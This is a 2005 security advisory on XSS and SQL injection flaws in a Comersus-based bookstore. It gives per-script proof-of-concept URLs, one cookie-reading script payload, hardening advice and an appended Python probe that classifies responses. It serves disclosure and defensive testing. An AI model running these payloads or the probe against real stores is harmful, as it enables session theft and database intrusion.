comersusXSSsql.txt
Lostmon, packetstormsecurity.com, Aug 14, 2005 (PACKETSTORM:39307)
`##################################################################
Spread The Word (Comersus-based bookstore) multiple script and
variable XSS and SQL injection vulnerabilities.
vendor url: http://www.stwm.com/opportunity.asp
advisory url: http://lostmon.blogspot.com/2005/05/spread-word-multiple-xss-and-sql.html
vendor notified: yes   exploit available: yes
##################################################################
  
Spread The Word (Comersus-based bookstore) contains a flaw that
allows a remote cross-site scripting attack. The flaw exists because
the application does not validate multiple variables submitted to
multiple scripts. An attacker can craft a URL that, when opened by a
victim, executes arbitrary script in the victim's browser within the
trust relationship between the browser and the server, leading to a
loss of integrity (the injected script can read the session cookie,
as the document.cookie proof of concept below shows). The same
unvalidated variables are also concatenated into database queries:
a single quote produces an SQL error page that discloses the
installation path, the "SQL errors and path disclosure" noted
against each script below.
  
  
##############  
versions:  
##############  
  
I could not establish which versions are affected.
  
##############  
solution:  
##############  
  
No solution was available at this time. Until the vendor ships a fix,
the generic hardening is: reject non-numeric values for Cat0, Cat1,
SearchType, ISBN, idRightPage and CurHigh before they reach a query,
HTML-encode Cat0Literal, Cat1Literal, strSearch and RedirectURL before
echoing them, build database queries with parameters instead of string
concatenation, and turn off detailed ASP/ADO error pages so an SQL
error no longer reveals the installation path.
  
##############  
timeline  
##############  
  
discovered: 17 Oct 2004
vendor notified: 08 Apr 2005
vendor response: 11 Apr 2005
disclosure: 24 May 2005
  
  
  
####################  
proof of concepts:  
####################  
  
Some files carry a different prefix such as STW in some stores,
e.g. 'ShowContent.asp' in one store is 'STWShowContent.asp' in another.
  
#####################  
BrowseCategories.asp  
#####################  
  
XSS, SQL errors and path disclosure.
  
  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here]  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible  
  
http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible  
http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible  
  
Cat0Literal can be Books, Videos, Gifts, Bibles, or any other
category name listed in the store.
  
#############  
search.asp   
#############  
  
XSS, SQL errors and path disclosure.
  
  
http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala  
http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1  
http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate='  
  
##################  
AdvancedSearch.asp  
##################  
  
http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit  
  
  
##################  
ViewItem.asp  
##################  
  
XSS, SQL errors and path disclosure.
  
http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565  
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here]  
  
http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565  
http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION]  
  
  
  
####################
STWShowContent.asp
####################
XSS, SQL errors and path disclosure.
  
  
http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE]  
  
http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION]  
http://[target]/store/STWShowContent.asp   
  
###################  
MySide.Asp  
###################  
XSS, SQL errors and path disclosure.
  
  
http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]  
http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles  
  
#################  
BrowseMain.asp  
#################  
XSS, SQL errors and path disclosure.
  
http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4  
http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"><script>alert(document.cookie)</script>  
  
################  
others  
################  
XSS   
http://[target]/store/[email protected]&RedirectURL=[XSS-CODE]  
http://[target]/store/Login.asp?RedirectURL=[XSS-code]  
  
SQL or XSS code can also be injected through the 'Cat0' or 'Cat1'
variable in every script that uses them.

XSS code can also be injected through the 'Cat0Literal' or
'Cat1Literal' variable in every script that uses them.
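As an added example (not part of Lostmon's advisory or of the Comersus/STW code), the following Python script turns the PoC list above into a one-parameter-at-a-time probe and classifies each response the way the advisory does: marker echoed unencoded (XSS), ADO/Jet error text (SQL error) and a drive-letter path in the error page (path disclosure). Script and parameter names are copied from the PoC URLs; the baseline values, the marker, the error-string patterns and the three sample responses are constructed for the example, and `offline_fetch` stands in for a real HTTP client so the script runs without a target.

```python
"""Offline checker for the probe URLs listed in this advisory.

Added example; not part of Lostmon's advisory or the Comersus code.
Script and parameter names are taken from the PoC URLs above. The
responses in SAMPLE_RESPONSES are constructed to look like a classic
ASP / ADO error page and an echoed parameter; a real store will differ.
"""
import re
from urllib.parse import parse_qsl, urlencode, urlsplit

# Script -> injectable parameters, as listed in the PoC section.
PROBE_TARGETS = {
    "BrowseCategories.asp": ["Cat0", "Cat0Literal", "Cat1", "Cat1Literal"],
    "Search.asp": ["InStock", "SearchType", "strSearch", "SearchCat1",
                   "SearchCat2", "PriceMin", "PriceMax", "PublicationDate"],
    "AdvancedSearch.asp": ["strSearch"],
    "ViewItem.asp": ["ISBN", "Cat0"],
    "STWShowContent.asp": ["idRightPage"],
    "MySide.Asp": ["Cat0", "Cat0Literal"],
    "BrowseMain.asp": ["Cat0", "Cat0Literal", "CurHigh"],
    "Login.asp": ["RedirectURL"],
}

# Valid-looking baseline values from the PoC URLs, so each probe changes
# only one parameter at a time (assumed values, taken from the page).
BASELINES = {
    "BrowseCategories.asp": {"Cat0": "783", "Cat0Literal": "Gifts",
                             "Cat1": "839", "Cat1Literal": "Bible"},
    "ViewItem.asp": {"ISBN": "0789906651", "Cat0": "565"},
    "BrowseMain.asp": {"Cat0": "783", "Cat0Literal": "Gifts", "CurHigh": "3"},
    "STWShowContent.asp": {"idRightPage": "13032"},
}

# One marker covers both checks: the single quote breaks an SQL string,
# the quote and angle brackets must come back unencoded for XSS.
MARKER = "'\"><ls7x>"

# Error strings typical of ADO/Jet error pages (constructed patterns).
SQL_ERROR_RE = re.compile(
    r"Microsoft (OLE DB|JET Database|VBScript runtime)|ODBC Drivers? error"
    r"|Syntax error in (string|query expression)|Unclosed quotation mark"
    r"|Incorrect syntax near|error '8004[0-9a-f]{4}'",
    re.IGNORECASE,
)
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s<>\"']+")  # e.g. D:\inetpub\...


def build_probe_url(base, script, baseline, param, marker=MARKER):
    """Append `marker` to one parameter, keeping the others at baseline."""
    qs = dict(baseline)
    qs[param] = qs.get(param, "") + marker
    return f"{base}/{script}?{urlencode(qs)}"


def classify_response(body, marker=MARKER):
    """Return the set of findings for one response body."""
    findings = set()
    if marker in body:          # echoed verbatim: <ls7x> would be parsed as a tag
        findings.add("xss")
    if SQL_ERROR_RE.search(body):
        findings.add("sql-error")
    if PATH_RE.search(body):
        findings.add("path-disclosure")
    return findings


def run_probes(base, fetch, targets=PROBE_TARGETS, baselines=BASELINES):
    """Probe every (script, param) pair; `fetch(url)` returns the body."""
    results = {}
    for script, params in targets.items():
        for param in params:
            url = build_probe_url(base, script, baselines.get(script, {}), param)
            results[(script, param)] = (url, classify_response(fetch(url)))
    return results


# --- constructed responses standing in for a live store --------------------
SAMPLE_RESPONSES = {
    # Cat0Literal echoed into the title unencoded (constructed).
    ("BrowseCategories.asp", "Cat0Literal"):
        "<html><head><title>Browse: Gifts'\"><ls7x></title></head></html>",
    # Cat0 concatenated into SQL; Jet error page naming the .mdb (constructed).
    ("BrowseCategories.asp", "Cat0"):
        "Microsoft OLE DB Provider for ODBC Drivers error '80040e14'<br>"
        "[Microsoft][ODBC Microsoft Access Driver] Syntax error in query "
        "expression 'idCategory = 783''.<br>/store/BrowseCategories.asp, line 42"
        "<br>D:\\inetpub\\wwwroot\\store\\database\\comersus.mdb",
    # strSearch HTML-encoded before output: not exploitable (constructed).
    ("Search.asp", "strSearch"):
        "Results for <b>&#39;&quot;&gt;&lt;ls7x&gt;</b>",
}


def offline_fetch(url):
    """Stand-in for an HTTP GET: answer from SAMPLE_RESPONSES, else a clean page."""
    parts = urlsplit(url)
    script = parts.path.rsplit("/", 1)[-1]
    qs = dict(parse_qsl(parts.query))
    for (s, param), body in SAMPLE_RESPONSES.items():
        if s == script and MARKER in qs.get(param, ""):
            return body
    return "<html><body>normal page</body></html>"


if __name__ == "__main__":
    for (script, param), (url, found) in run_probes("http://target/store", offline_fetch).items():
        if found:
            print(f"{script} {param}: {sorted(found)}  {url}")
```

To run it against a live store, replace `offline_fetch` with a function that performs the GET (for example with `urllib.request.urlopen`) and returns the decoded body, and add the STW-prefixed script names noted above to `PROBE_TARGETS` for installations that use them. A clean result only means the marker was encoded or not reflected in that response; it does not prove the parameter is safe in every output context.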
  
######################### End ########################  
  
Thanks to estrella for being my light
Thanks to icaro, he is my Shadow !!!
Thanks to all the http://www.osvdb.org Team
Thanks to all who support me day after day !!!
--
Regards:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Data Mangler of: http://www.osvdb.org
--
Curiosity is what keeps the mind moving
`